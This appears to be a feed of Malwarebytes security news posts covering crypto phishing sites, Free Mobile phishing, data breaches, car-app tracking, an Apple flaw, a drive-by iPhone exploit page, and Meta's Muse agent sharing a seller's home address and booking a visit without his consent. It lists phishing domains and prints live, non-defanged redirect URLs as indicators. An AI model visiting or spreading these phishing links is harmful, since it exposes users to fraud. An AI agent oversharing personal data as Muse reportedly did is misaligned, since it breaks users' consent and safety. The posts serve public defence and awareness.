Malware Bytes

Fake xStocks, Pendle, and other sites bait crypto users with rewards votes

Malware Bytes Security - Thu, 10/01/2026 - 1:08pm

We found 70 websites that impersonate legitimate crypto projects that invite visitors to vote on the date of an upcoming rewards distribution.

The pages copy the look of the real sites closely, and on most of them the offer is small and believable: Cast a vote, and as an active voter you get a 1.25x boost when the rewards are paid out.

However, the vote is fake and clicking the Vote now button opens a wallet connection prompt. It’s the first step toward requests that could trick visitors into authorizing access to their tokens.

The brands being copied include xStocks from Kraken, Pendle, Zama, Kinetiq, Yield Basis, Firelight, and smaller platforms including Umia, Keeta, and NetNet. None of these pages are affiliated with the projects they imitate.

Copies of familiar brands

Each site is a close copy of the project it targets, down to the logo, menus, and colors. The Firelight copy even carries a real announcement about the protocol’s deposit cap, suggesting the pages were copied from the live sites rather than rebuilt from scratch.

Most use the same wording about voting on the rewards date to earn a boost, though a few vary the pitch. The Pendle copy adds fake dates and a countdown to create urgency, the Keeta copy promises points instead of a boost, and the NetNet copy skips the vote and warns that unclaimed tokens will be burned after 48 hours.

Why these brands

The choice of targets does not appear to be random. Several of the impersonated projects have held a token launch, airdrop, or public token sale within the past year. Others run points or rewards programs. Their communities are used to hearing about rewards, claims, and allocations, and are primed to act on them.

Zama ran a public token auction in January, and its token began trading in February. Kinetiq launched its governance token alongside an airdrop to early users in November 2025. Umia’s token auction ran from August 29 to September 2, only weeks ago. Firelight awards points to early depositors, and Pendle launched on Robinhood Chain on September 4.

A message about rewards from one of these projects would not sound strange to someone who follows it. The lure appears designed to appeal to people who already hold the token or have used the protocol, because they’re the ones who might expect a distribution and want a bigger share.

What happens when you click vote

The Vote button does not lead to a ballot. It opens a Connect Wallet window that is the same regardless of which brand the page imitates. It lists WalletConnect, MetaMask, Trust Wallet, OKX Wallet, Binance Wallet, Bitget Wallet, and Rabby, along with an option to browse more than 28 others.

This window resembles the connection prompts people see on legitimate crypto sites, which may make the request seem routine.

Connecting a wallet on its own shares the wallet’s address, allowing the site to look up its holdings. At this point, it does not give the site permission to spend your tokens.

The damage typically comes from what the site asks for next. In wallet-draining scams, a page may follow the connection with a request to sign a message or approve a transaction, presented as confirming the action the visitor came to take. A malicious approval or signature can give the attacker permission to move tokens out of the wallet without further confirmation.

Blockchain transactions generally cannot be reversed, so stolen funds are very difficult to recover.

Signs of a single operation

Several details suggest a shared operation or phishing kit. All of the domains listed at the end of this article follow the same pattern: sitemu followed by a string of apparently random characters, on the .xyz top-level domain.

The same templates are reused across several different brands, with the text appearing almost word for word whether the page is dressed up as Zama, Firelight, or Yield Basis—right down to writing the boost as 1,25x, with a comma in place of the decimal point. The wallet connection window behind the Vote button is identical across the brands as well.

Random domain names spare the operator the work of coming up with a convincing lookalike address for each brand, and losing any single site costs them little. They also make the address bar one of the clearest giveaways on these pages.

How to protect your wallet

Check any claimed vote or rewards distribution through the project’s official channels before connecting your wallet. A familiar logo is easy to copy.

  • Check the address, not the design. These pages closely copy the real thing, so branding alone cannot establish that they are genuine. If the domain is not the one the project officially uses, close the tab.
  • Go to the project directly. If a vote or a reward is genuine, it will be on the project’s official site or announced on its established social accounts. Use a bookmark or type the address yourself rather than following a link from a message, ad, or reply.
  • Read what your wallet asks you to sign. Voting should not require you to approve spending of your tokens. If a signature or transaction request mentions approvals, permits, or transfers, reject it. Wallets that preview the outcome of a transaction can help, but do not approve a request you cannot understand.
  • Be wary of boosts, bonuses, and deadlines. Promises of extra rewards and warnings that unclaimed tokens will be burned can pressure you to act before checking.
  • Keep most of your funds in a separate wallet. Use a wallet with a small balance for unfamiliar sites, and keep long-term holdings in a wallet that you don’t use for those connections.
  • If you already connected, disconnect from the site. If you also signed a message or approved a transaction, use your wallet’s approval-management feature or a trusted token approval checker to review and revoke suspicious permissions. Disconnecting alone does not revoke token approvals. If you suspect your recovery phrase or private key was exposed, move remaining funds to a new wallet created with a new recovery phrase.
How Malwarebytes helps

Malwarebytes Browser Guard can block known phishing and scam sites before you interact with them. That is useful in campaigns like this one, where the fake page closely resembles the real thing.

If you receive a link to a rewards vote, claim page, or airdrop and are unsure about it, Malwarebytes Scam Guard can help assess the link before you connect your wallet. Check the offer through the project’s official channels too.

Indicators of compromise
  • sitemufl06qs0r4o[.]xyz
  • sitemui6m6bbj1bd[.]xyz
  • sitemui8go6g99bb[.]xyz
  • sitemuicitd4jrtr[.]xyz
  • sitemuidkr38kji0[.]xyz
  • sitemuidlij5urd0[.]xyz
  • sitemuif3pa5k4eh[.]xyz
  • sitemuife3h91vjj[.]xyz
  • sitemuioeefbyh3i[.]xyz
  • sitemuioi7005ekb[.]xyz
  • sitemuizkhpdbjnv[.]xyz
  • sitemuj1xencnin8[.]xyz
  • sitemuj7lzbasipw[.]xyz
  • sitemujbcz1nas1x[.]xyz
  • sitemujdi54aitrf[.]xyz
  • sitemujejvp4tp0x[.]xyz
  • sitemujffobdhxgj[.]xyz
  • sitemuji07m137aw[.]xyz
  • sitemujoqrmsm0et[.]xyz
  • sitemujrfn7witew[.]xyz
  • sitemujsm7brhwh0[.]xyz
  • sitemujtcvh5q9fj[.]xyz
  • sitemujtd8ingh2b[.]xyz
  • sitemujtdkvy6c7n[.]xyz
  • sitemujufht1ntj4[.]xyz
  • sitemujufs1975v4[.]xyz
  • sitemujug76lkyke[.]xyz
  • sitemujumvtmjaf1[.]xyz
  • sitemujuncdlpnng[.]xyz
  • sitemujuno47vpud[.]xyz
  • sitemujunzgjapds[.]xyz
  • sitemujw19idqe01[.]xyz
  • sitemujw1uspghl1[.]xyz
  • sitemujwcvm5ufu8[.]xyz
  • sitemujxjlv2lmhh[.]xyz
  • sitemuk3jcm1olr8[.]xyz
  • sitemuk3jpe1eph7[.]xyz
  • sitemuk3z1hh2tvn[.]xyz
  • sitemuk3zjrr2ufy[.]xyz
  • sitemuk3zu5776gi[.]xyz
  • sitemuk6zd201nsw[.]xyz
  • sitemuk7f31386dx[.]xyz
  • sitemuk7fi1dcrp4[.]xyz
  • sitemuk7fvnvihra[.]xyz
  • sitemuk7xbyszpzj[.]xyz
  • sitemuk7y434m4om[.]xyz
  • sitemuk7yi5eqn74[.]xyz
  • sitemuk7ys6db9qj[.]xyz
  • sitemuk9ayiwadjz[.]xyz
  • sitemuk9c4oppeco[.]xyz
  • sitemukh5awm67rj[.]xyz
  • sitemukpy2hpmpwv[.]xyz
  • sitemukrod1am6ez[.]xyz
  • sitemukvxv7j5hmv[.]xyz
  • sitemukvy7wudsqb[.]xyz
  • sitemukww7ivnaji[.]xyz
  • sitemukwxih8302f[.]xyz
  • sitemul94tcv4l80[.]xyz
  • sitemul95f18sowo[.]xyz
  • sitemul95pxqgmm8[.]xyz
  • sitemulaay8dbm66[.]xyz
  • sitemulaucnbmnrd[.]xyz
  • sitemulffos1qryn[.]xyz
  • sitemuli8pd7qi9z[.]xyz
  • sitemulpmt6if530[.]xyz
  • sitemulpnff7964j[.]xyz
  • sitemulpo7jkntfz[.]xyz
  • sitemulr9d1dg77r[.]xyz
  • sitemuls00qrsh0k[.]xyz
  • sitemulszq4rm2yn[.]xyz
Categories: Malware Bytes

Shadow AI explained: The work shortcut that could leak your company’s secrets

Malware Bytes Security - Thu, 10/01/2026 - 10:05am

Using an AI chatbot, assistant, or browser to speed up your work is tempting, but doing it without your employer’s knowledge can put sensitive data at risk.

You’re swamped, so you paste a long email thread into a free chatbot and ask for a summary. It works, it saves an hour, and nobody notices. But the thread may contain customer details or confidential plans you’ve just shared with an outside service.

If your employer hasn’t approved that tool or how you’re using it, that’s shadow AI.

The UK’s National Cyber Security Centre (NCSC) defines shadow AI as:

“the use of AI technology which isn’t captured in an organisation’s approved systems and processes.”

A Microsoft study published in 2025 found that 71% of UK employees surveyed said they had used AI tools at work their employer hadn’t approved. Most people aren’t doing this to cause trouble. They want to get their work done faster, and the tools are right there.

Shadow AI isn’t limited to chatbots. It can also be:

  • A browser extension that “improves your writing.”
  • A meeting-notes bot that joins your calls.
  • An AI feature quietly switched on inside an app you already use.
  • A small automation you built yourself that sends data to an AI service.

AI features are appearing in search engines, email apps, and phones. Instead of a helpful list of links, Google now tries to answer your question. Microsoft’s Copilot drafts replies to your boss before you’ve had coffee. Your phone summarizes conversations you don’t even remember having. That makes it easy to start using one without checking whether it’s approved for work.

Why it worries IT and security teams

When you enter data into a public AI tool, it leaves your company’s control. The service may keep that data or use it to improve its models, unless specific privacy controls are in place. That can lead to data breaches, lost intellectual property, and regulatory problems.

There is also a security angle. AI assistants and agents—tools that can take actions on your behalf—are complex software and can have serious vulnerabilities. If an attacker exploits one, they may gain access to the data and services the tool has.

IBM’s 2025 Cost of a Data Breach research found that one in five organizations reported a breach linked to shadow AI. Only 37% had policies to manage AI or detect shadow AI. Organizations with a lot of shadow AI paid roughly $670,000 more per breach.

In a survey of our newsletter readers, 90% of respondents said they were worried about AI using their data without consent. Company data deserves the same care as your own.

How to use AI more safely at work

You don’t need to avoid AI altogether. Think carefully about which apps and services you use before you share data. Start by talking to your employer, then follow these steps:

  • Ask for an approved tool. Security leaders say the best way to reduce shadow AI is to offer something better and safer, such as an enterprise AI platform with guardrails.
  • Use your work account, not a personal one. Work accounts are the ones your IT team can protect and govern.
  • Find out what’s off-limits. Customer details, financial data, HR records, source code, and confidential meeting content may be restricted. Ask which kinds of data you may and may not use with AI.
  • Check the privacy settings. Look at whether the tool stores your inputs or uses them to train its models.
  • Register your use case. Many organizations keep a list of approved AI tools and uses. A quick approval process makes it easier to stay on the right side of the rules.
  • Be careful with agents and plug-ins. Tools that connect to your email, files, or calendar should be reviewed by your IT or security team first.
  • Speak up. If the approved tools aren’t meeting your needs, say so. The NCSC recommends open conversations about security to help reduce reliance on unapproved tools.

If you manage a team, remember that banning AI outright tends to push the use further out of sight. Find out why people are turning to unapproved tools. Providing useful, approved options and clear rules can help staff work faster while protecting company data.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Convincing Free Mobile phishing emails appear after data breach

Malware Bytes Security - Thu, 10/01/2026 - 7:30am

Free Mobile, one of France’s main cellular providers, was fined €27 million by France’s data protection regulator, the CNIL, in January over failures to protect customer data. The October 2024 breach allowed an unauthorized party to access sensitive customer records, including bank account details and login information. Since the breach, we’ve seen many poorly written scam campaigns targeting Free Mobile customers.

However, over the past few weeks, a well-written scam has appeared, closely copying the design of the official Free Mobile website and email templates.

One of our employees, who is a Free Mobile customer, received this phishing email on Wednesday, September 30. The message used the same logo and template as legitimate emails from the company, but came from the suspicious email address freemobile-regularisation[@]knowledgegrowthcenter[.]help. It included a link that appeared to point to regularisation.free.fr :

The email tells the user that an invoice of €9.99 needs to be paid to avoid having the customer’s service suspended. Clicking the link opens a redirection chain:

1. https://u2l.ai/Q5YwFz301 2. https://espace-free-mobile.pro/Ds41LE/302 3. https://espace-free-mobile.pro/Ds41LE/regularisation/?impaye=92a9e77d…200

This final domain, espace-free-mobile.pro, is hosted by Cloudflare and was registered just a month ago.

The final link opens a convincing page with a form asking for credit card details:

The phishing page looks authentic, which sets this campaign apart from many of the Free Mobile scams we’ve seen since the breach.

We initially saw the same campaign using less convincing redirection chains, like this example from July:

1. https://bly.to/93kie5u 2. https://s1181402.ha026.t.mydomain.zone/mbl/ 3. https://s1181402.ha026.t.mydomain.zone/mbl/regularisation/?impaye=505…

More recently, we’ve seen more authentic-looking domains, all hosted by Cloudflare:

1. https://s.ink/jmCnZZ
2. https://freesas.info/Cf4tP/
3. https://freesas.info/Cf4tP/regularisation/?impaye=f13fa919d1a22833557…

And another example:

1. https://bly.to/jabwpf6
2. https://regularisation-free.info/portail/
3. https://regularisation-free.info/portail/regularisation/?impaye=83f91… How to stay safe

Malwarebytes can help protect you from these threats, but treat unexpected messages about your accounts and invoices with caution:

  • Don’t follow links in unsolicited emails. If a message concerns your account, open the official Free Mobile app or website directly, or call the official help line at 3244.
  • Check the actual domain in your browser’s address bar to see if it matches what you expect—https://mobile.free.fr in this case.
  • Malwarebytes Browser Guard detects and blocks this scam directly in your browser.
  • Use an up-to-date, real-time anti-malware solution with a web protection component on all your devices.
  • Malwarebytes Scam Guard can help you determine whether an email is a scam and advise you on what to do next.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

Malwarebytes earns another Top Product award in independent testing

Malware Bytes Security - Thu, 10/01/2026 - 6:51am

Every few months, Malwarebytes gets a chance to test its mettle against real-world threats in an independent laboratory setting. And the latest round of results gives us plenty to celebrate.  

Malwarebytes earned a perfect 18 out of 18 and received another Top Product award from AV-TEST. We also achieved Level 1 Certification from MRG Effitas, and we stopped 100% of threats before they could run in the two latest tests from AVLab Cybersecurity Foundation. 

AV-TEST Windows Consumer Security Product Test

With 18 out of 18 points in AV-TEST’s latest Windows Consumer Security Product Test, Malwarebytes nabbed the organization’s Top Product award for the July/August test cycle.

AV-TEST evaluates security products across three key areas: protection against malware, impact on device performance, and the frequency of false positives. Products need at least 17.5 out of 18 points to earn AV-TEST’s Top Product award, and Malwarebytes received full marks across the board.

Since we first began participating in the test in 2018, we’ve secured the Top Product award more than a dozen times.

MRG Effitas Consumer Assessment 

Malwarebytes also received a Level 1 Certification in MRG Effitas’ July 2026 Consumer Assessment & Certification Programme, which tested eight security products against malware, phishing, and false positives.  

The malware test used 300 live, in-the-wild samples, including Trojans, spyware, ransomware, backdoors, malicious scripts, and financial malware. Malwarebytes blocked every one of them, stopping 99% before they had the chance to run, and the remaining 1% after they began behaving maliciously.  

Our product also generated zero false positives across 100 legitimate apps and blocked all five live phishing sites included in the test. 

Malwarebytes was one of just two products to earn Level 1 Certification, the highest level awarded in the assessment. 

AVLab Cybersecurity Foundation Advanced In-the-Wild Malware Test 

Meanwhile, the results from AVLab Cybersecurity Foundation’s Advanced In-the-Wild Malware Test brought more good news: Malwarebytes keeps getting better at stopping threats before they can run. 

As part of the test, AVLab Cybersecurity Foundation uses threats circulating online and delivers them in ways designed to replicate how people encounter attacks in the real world. 

During both the May and July 2026 tests, Malwarebytes stopped 100% of threats before they could run. 

These latest results join a growing list of honors, including a Best of CNET award and ZDNET’s Editor’s Choice award.

Independent testing helps keep us sharp. We’re proud to see our work recognized, and even prouder to keep delivering the top-notch protection our customers have come to rely on. 

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Categories: Malware Bytes

Pentagon breach exposes Social Security numbers and military records of millions

Malware Bytes Security - Thu, 10/01/2026 - 6:48am

The US government is alerting millions of people that their personal information was stolen during a breach of the Pentagon’s personnel records at the Defense Manpower Data Center (DMDC).

The DMDC is a central US Department of Defense (DoD) organization that manages personnel records, ID credentials, and benefit entitlements for military and civilian staff, veterans, and their families. It maintains over 60 million records for US military and civilian staff and their family members to help determine benefits and entitlements, such as healthcare and retirement.

Reportedly, cybercriminals had access from October 2025 to July 2026. CNN reports that the Pentagon confirmed the breach affects 2.76 million living individuals, potentially including current and former defense personnel or their dependents, and 294,000 deceased individuals.

A notification shared on Reddit states:

“A small number of unauthorized users accessed files on a server containing unencrypted PII.”

PII means personally identifiable information. The attackers gained access by exploiting a security vulnerability in an unspecified file-sharing system. The Pentagon says it has “no indication” of misuse. It hasn’t explained how it reached that conclusion or what it considers misuse, and it doesn’t rule out future misuse of the exposed information.

The exposed data is said to include Social Security numbers, names, dates of birth, sex, race, and service details. Some records also include contact information and occupational specialty.

Besides the risk that this data could help foreign intelligence services track US personnel, affected people face a lasting risk of identity theft. Birth dates cannot be changed, and Social Security numbers can only be changed in limited circumstances.

Breaches happen every day. Don’t be the last to know.

SEE PLANS

What to do if you’re affected

The Pentagon is offering 12 months of credit monitoring through IDX. If you receive a notification letter, take up the offer and consider a credit freeze with all three major credit bureaus: Equifax, Experian, and TransUnion. A freeze is free and restricts access to your credit report, helping prevent someone from opening new credit accounts in your name.

Other recommendations are:

  • Get an IRS Identity Protection PIN to prevent someone else from filing a federal tax return using your Social Security number.
  • Be suspicious of unexpected calls, emails, and texts, especially ones that mention your unit, rank, or job. Attackers can use the stolen details to make phishing attempts more convincing.
  • Verify requests through official channels you look up yourself, rather than through contact details in the message.
  • Use unique passwords and multi-factor authentication on email, banking, and benefits accounts.
  • Limit location sharing and review privacy settings on phones and apps, since military leaders have raised concerns about commercial location data being used to target personnel.
  • Follow instructions in the breach letter and further official communications and report any suspicious approach to your security officer.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

Losing gamblers pushed to bet more by DraftKings’ AI, report says

Malware Bytes Security - Thu, 10/01/2026 - 4:53am

Two separate investigations have raised concerns about betting site DraftKings’ marketing to target problem gamblers, including its use of AI. On September 19, the New York Times reported that the company’s machine learning model targeted people who were more likely to respond to betting promotions by gambling and losing more money.

The model crunched data on each customer, including how often they bet, how much they lost, and what their daily account balances were. According to the report, it used this information to send targeted advertising to lure those people back to the site with promotions. DraftKings uses promotions to entice users into betting more. These offers include profit boosts on winnings.

At news nonprofit ProPublica, journalist Jake Pearson made himself an experimental subject. He spent thousands of dollars betting on the DraftKings app in an experiment to see how the company’s marketing would play out. He reported receiving more promotions as his losses mounted.

After he lost nearly $1,800 betting on basketball in a single evening, DraftKings invited him to a VIP tryout. Full membership followed later.

DraftKings would occasionally send automated messages reminding him to bet responsibly, he said. But he found they were no match for the product design pushing him to do more gambling.

DraftKings denied unfair targeting of gambling customers, arguing instead that its promotions reward engagement rather than losses.

The company’s machine learning model, which former insiders say was developed starting in 2023, replaced a cruder system that crunched basic numbers to report on a user’s behavior.

The newer system dug through data on its own, assessing how much individuals would be likely to lose after receiving promotions. It created an “elasticity” score and used it to identify customers likely to lose more in response to offers, the Times said. This would help the company maximize its return on its promotional spending, said former employee Jayden Butts, who helped develop the system. Butts spoke to the Times as part of an investigation that included interviews with over 40 former employees, along with reviews of Slack communications, internal memos, and betting records.

Other employees attempted to get approval for another model at DraftKings. It would analyze gambling activity in a similar way, but with the opposite goal: to flag users whose gambling was getting out of hand and who were at risk of falling into crisis. According to the data scientists interviewed by the Times, the system showed promise at identifying customers who might need help with compulsive gambling, but DraftKings shut the project down after canceling a demo. Later attempts to develop similar systems within the company also failed.

Behavioral ads and gambling harm

Digital rights advocates warn that AI enables companies to process more data faster for digital advertising. The Electronic Frontier Foundation says this:

“supercharges the harms of online behavioral advertising.”

It’s particularly damaging when advertising encourages addictive behaviors such as gambling.

And online betting looks set to expand. Companies including DraftKings are now running online casino games in select jurisdictions, while prediction markets that allow people to trade forecasts on specific events are also flourishing.

The statistics on gambling are alarming. The World Health Organization estimates that 1.2% of the world’s adult population has a gambling disorder, and that people betting at harmful levels generate around 60% of gambling losses. People struggling with gambling might find it difficult enough to stay away from gambling venues, but mobile gambling apps with hard-to-ignore push notifications and emails can increase the temptation.

What users can do

If you gamble, monitor your gambling activity and set limits, avoid chasing losses, give yourself timeouts from gambling, and talk to someone if you’re struggling with compulsive gambling.

In the US, the National Problem Gambling Helpline connects people with support and local resources via phone and online chat. In the UK, GamCare’s National Gambling Helpline provides 24/7 phone support and other resources.

From reporting threats to removing them.

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Hackers steal protective order and foster care records from Arizona courts

Malware Bytes Security - Wed, 09/30/2026 - 11:29am

“Arizona’s court system was targeted by a cyber attack from criminal hackers or their bots.”

This is how the Arizona Supreme Court announced that hackers had attacked the state’s court system and stolen the personal information of “many Arizonans.”

The court says the attack began with a phishing email containing a malicious link that a court employee clicked. The attackers copied sensitive backup files containing records related to protective orders and foster care cases.

The court says it has no evidence, so far, that information about jurors, witnesses, or court employees was included in the copied files. It has not identified the attackers or a motive. It says the case is under investigation with the FBI, and no ransomware group has publicly claimed responsibility.

In an update, the court revealed that the attackers copied more than 150,000 recommendation reports created by Arizona’s Foster Care Review Board. The reports cover current and past cases involving children’s care and protection, dating back to 2010.

Those documents can include information about children, names of involved parties, case materials considered by the board, findings, and recommendations for courts, parents, and the Arizona Department of Child Safety. The court says the reports do not contain contact information such as addresses or telephone numbers.

The copied files were backups stored in a highly compressed format, kept for recovery after ransomware and other destructive incidents.

Information associated with protective orders can raise particularly serious safety and privacy concerns. These orders can protect people from abuse, harassment, or threats. Even where some records are public, combining names, case details, locations, and other sensitive context could create risks for people who are trying to limit their exposure to an abusive or threatening individual.

Breaches happen every day. Don’t be the last to know.

SEE PLANS

The court currently says it has no evidence that the information has been shared. As with many breach investigations, however, this can change as investigators determine exactly what was taken and monitor for publication, sale, or misuse of the data.

Arizona has about 8,000 children currently in foster care, according to the court. It is contacting people believed to have been affected.

What to do if you’re affected
  • Check the court’s advice. Every breach is different, so check its dedicated webpage for updates and follow any specific advice it offers.
  • Watch out for impersonators. Cybercriminals may contact you posing as the Arizona Supreme Court, another government agency, or someone you know. Verify anyone who contacts you through a separate, trusted channel.
  • Take your time. Phishing attacks often impersonate people or brands you know and pressure you to act urgently, using themes such as missed deliveries, account suspensions, and security alerts.
  • Get an early warning if your information appears on the dark web. If you’ve been notified that your information was copied in the Arizona court breach, identity monitoring can help you watch for signs of exposure and get support if you become a victim of identity theft.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

Your car’s app could be telling Big Tech who you are and where you go

Malware Bytes Security - Wed, 09/30/2026 - 7:28am

A study testing 21 cars from 19 brands and 30 companion apps found connections to advertising and tracking companies, and evidence that some apps shared sensitive personal data.

Modern cars can unlock remotely, route around traffic, stream entertainment, summon roadside help, and cool or heat the cabin before you get in. But those conveniences come with a privacy cost that drivers may struggle to see and are unable to refuse.

We’ve covered cars and privacy a few times before, especially after Mozilla researchers described cars as a “privacy nightmare.”

Texas Attorney General Ken Paxton investigated car manufacturers seeking details of their data collection and sharing practices, and sued General Motors over allegations that it sold customer driving data to third parties.

Researchers from Northeastern University, working with Consumer Reports, tested vehicles from model years 2022 through 2025 and companion apps, observing network traffic while cars were stationary, driven, and used through their apps. The results reinforce an uncomfortable reality: connected vehicles are data-collection platforms on wheels.

The results in a nutshell:

  • Both vehicles and companion apps contacted third-party domains, including those associated with advertising and tracking.
  • 19 of 21 vehicles contacted at least one third party over Wi-Fi.
  • 7 of 30 apps transmitted sensitive identifiers to third parties associated with advertising and tracking.

The troubling part is not that a car talks to its manufacturer. After all, a connected vehicle needs some network access for safety alerts, navigation, account functions, and maintenance. The bigger issue is the potential combination of identifiers. A vehicle identification number (VIN) can link a particular vehicle to its owner, while precise location can reveal highly sensitive patterns: where someone sleeps, works, worships, seeks medical care, spends time with friends, or travels. Add an email address or a name, and that information can be easier to connect to the detailed consumer profiles held by advertisers and data brokers.

And that’s before considering the privacy concerns around cameras that monitor drivers’ faces for signs of distraction or impairment.

Consent with strings attached

Consent is a weak safeguard when drivers have to accept extensive terms to use functions advertised as part of the vehicle. Several manufacturers said their connected services were opt-in, but declining can mean losing useful functionality. For example, Consumer Reports noted a Tesla warning that refusing its agreement may result in:

“reduced functionality, serious damage, or inoperability.”

That hardly sounds like freely given, informed consent.

There was one sign that scrutiny can matter: after researchers presented their findings, Honda told Consumer Reports it had directed vendor Amplitude to delete location data it received and stopped sending it going forward. But consumers should not need an academic study to discover who their car or its app is sharing data with.

Especially when Amazon, Google, Meta, and Microsoft—companies that already know plenty about us—were among the leading recipients of the driver data.

Until automakers collect less data and provide clear privacy settings, meaningful opt-outs, and deletion controls, drivers should treat a connected car, and especially its companion app, as another privacy-sensitive device. Review app permissions, turn off optional data-sharing settings, avoid linking unnecessary accounts, and ask manufacturers what data they retain, share, and delete.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Meta’s Muse sent a Facebook Marketplace buyer to a seller’s home

Malware Bytes Security - Tue, 09/29/2026 - 8:51am

A Facebook Marketplace buyer arrived at a seller’s apartment to collect a keyboard. The seller wasn’t home and didn’t know anyone was coming. Meta’s AI assistant Muse had handled the conversation, shared his address, and arranged the visit without telling him.

We often write about AI misalignment and how to use AI agents and browsers safely. That can sound theoretical, but this is an example of the real-world risk when an agent is allowed to act on someone’s behalf.

Muse is Meta’s semi-autonomous AI assistant, released in the US in September. Meta promotes it as a personal assistant that can help users automate tasks, including responding to Facebook Marketplace messages. Unlike a conventional chatbot, which waits for a prompt and produces an answer, an AI agent may be authorized to take actions within connected apps.

We’ve written about a separate weakness in Muse that researchers considered dangerous. Reportedly, Muse was downloaded 3 million times in its first week.

According to Business Insider, a Facebook Marketplace seller turned on Muse to help handle a keyboard listing. He entered his address as the pickup location and approved automatic replies. Muse then shared that address with a prospective buyer, negotiated over the item, and arranged a visit, the seller said. He says Muse did not ask permission to share his address or arrange the visit, and did not tell him it was happening. The buyer arrived at the seller’s apartment expecting to complete the purchase, but the seller wasn’t home. The sale didn’t happen.

The reported incident is more than a privacy failure. It illustrates a broader AI-agent risk: An agent may treat permission to reply automatically as permission to share sensitive information or commit you to an in-person meeting. Meta says it is looking into the report.

How to use AI agents safely

Before enabling an AI agent, treat its setup screen as a security review. Do not assume that an integration with a trusted platform means the agent will understand your intentions or apply sensible limits automatically.

Pay particular attention to:

  • Connected accounts: Review every service the agent can access, such as email, messages, calendars, cloud storage, shopping accounts, or social media profiles.
  • Data access: Consider whether it can read addresses, contacts, photos, private messages, payment details, documents, or location data.
  • Action permissions: Check whether the agent can send messages, post content, negotiate, make bookings, place orders, alter listings, or share information externally.
  • Automatic actions: Apply settings that require approval before the agent sends, publishes, buys, deletes, or shares anything sensitive. Check how it will notify you about the plans it makes on your behalf.
  • Audience controls: Confirm exactly who can receive information generated by the agent. “Anyone who messages me” is very different from “people I approve.”

Give an AI agent the least access necessary for the task. If you only want help writing replies, do not enable automatic sending. If you want an AI agent to manage a listing, use a public meeting location or a separate pickup address rather than your home address.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Update your iPhone, iPad, or Mac: Flaw could run attackers’ code

Malware Bytes Security - Tue, 09/29/2026 - 6:35am

Apple has released updates for iPhones, iPads, and Macs to fix a flaw that could let an attacker run code when a device processes a malicious file. Apple says it may have been used in highly targeted attacks against iPhone users running versions of iOS before iOS 27.

The fix is in iOS and iPadOS 26.7.1, as well as macOS Sequoia 15.8.1 and macOS Tahoe 26.7.1. Check Software Update on each of your Apple devices and install the latest version offered.

Updates for your particular device

The table below shows which relevant updates are available and links to Apple’s security information for each one.

UpdateAvailable foriOS 26.7.1 and iPadOS 26.7.1iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and latermacOS Tahoe 26.7.1macOS TahoemacOS Sequoia 15.8.1macOS Sequoia How to update your Apple devices How to update your iPhone or iPad

To check if you’re using the latest software version, go to Settings > General > Software Update. You’ll see if an update is available and be guided through installing it.

Turn on Automatic Updates if you haven’t already—you’ll find it on the same screen.

Available update options on iPad How to update macOS on any version

To update macOS on any supported Mac, use Software Update:

  • Click the Apple menu in the upper-left corner of your screen.
  • Choose System Settings (or System Preferences on older versions).
  • Select General in the sidebar, then click Software Update on the right. On older macOS, look for Software Update directly.
  • Your Mac will check for updates automatically. If updates are available, click Update Now (or Upgrade Now for major new versions) and follow the on-screen instructions. Before you upgrade to macOS Tahoe 26, read Apple’s instructions.
  • Enter your administrator password if prompted, then let your Mac finish the update. It may need to restart.
  • Make sure your Mac stays plugged in and connected to the internet until the update is done.
Technical details

The bug, CVE-2026-86950, affects CoreGraphics, an Apple framework used throughout its operating systems and apps to display and process visual content such as images and PDFs.

It’s an out-of-bounds write issue, which Apple addressed with improved bounds checking. This type of bug happens when software writes data beyond the limits of its allocated area of memory. It can overwrite other data in memory, interfere with the normal operation of the program, cause a crash, or even let an attacker take control of the affected process. In this case, processing a maliciously crafted file may lead to an attacker running their own code.

Apple says it is aware of a report that the issue may have been exploited in an “extremely sophisticated attack” against specific people using versions of iOS before iOS 27. Although the reported attack was highly targeted, other attackers could try to exploit the flaw now that it has been disclosed. 

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Categories: Malware Bytes

Fake iPhone Duo preorder scam triggers DarkSword attack

Malware Bytes Security - Tue, 09/29/2026 - 5:56am

Apple announced its first foldable iPhone on September 9, and scammers were ready to ‘deliver’ one before anyone could buy it.

Most of what we found around the launch of the iPhone Duo and iPhone 18 Pro was familiar fraud.

But one fake preorder page was different.

The fake Apple-style page offers a $500 voucher and a ticking preorder deadline.

Behind its Apple-style design and $500 voucher, the page uses the leaked DarkSword exploit chain to try to break into vulnerable iPhones. If it succeeds, a separate payload attempts to steal saved credentials, cryptocurrency wallet data, and notes.

You don’t have to fill in the form, tap a download, or approve anything. Opening the page is enough to start the attempt.

The $500 voucher is a distraction

The page looks like Apple’s, down to its logo and “Copyright © 2026 Apple Inc.” footer. It promises an “Authorized Partner Exclusive” $500 voucher and AppleCare+ coverage if you complete a preorder form. The form asks for your name, email, and phone number, with WhatsApp “preferred,” but promises no upfront payment.

The form asks for contact details and offers Duo models and colors that do not match Apple’s.

But Apple doesn’t open iPhone Duo preorders until October 16. You cannot place an Apple preorder now. It offers 6.3-inch and 6.9-inch models in colors Apple doesn’t sell for the Duo. Its countdown starts over whenever the page loads, and its privacy, terms, and sales policy links go nowhere.

